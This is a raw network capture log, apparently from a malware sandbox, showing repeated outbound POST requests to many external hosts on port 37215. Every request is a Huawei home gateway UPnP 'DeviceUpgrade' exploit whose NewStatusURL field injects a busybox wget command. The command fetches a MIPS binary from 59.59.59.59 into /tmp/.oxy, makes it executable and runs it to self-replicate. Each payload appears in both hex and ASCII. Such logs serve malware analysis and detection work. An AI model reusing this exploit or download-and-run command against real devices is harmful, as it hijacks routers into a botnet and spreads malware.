                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1337192.168.2.1550264157.185.196.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805707932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1338192.168.2.1536442177.11.1.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805713892 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1339192.168.2.1549116157.163.218.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805738926 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1340192.168.2.154103273.190.19.20537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805979013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1341192.168.2.1536026157.13.205.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.806004047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1342192.168.2.1559744174.137.179.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.806026936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1343192.168.2.154574441.14.249.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.808300972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1344192.168.2.15479984.80.143.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.808326006 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1345192.168.2.1544014157.109.207.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.808353901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1346192.168.2.1547646197.17.80.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.808368921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 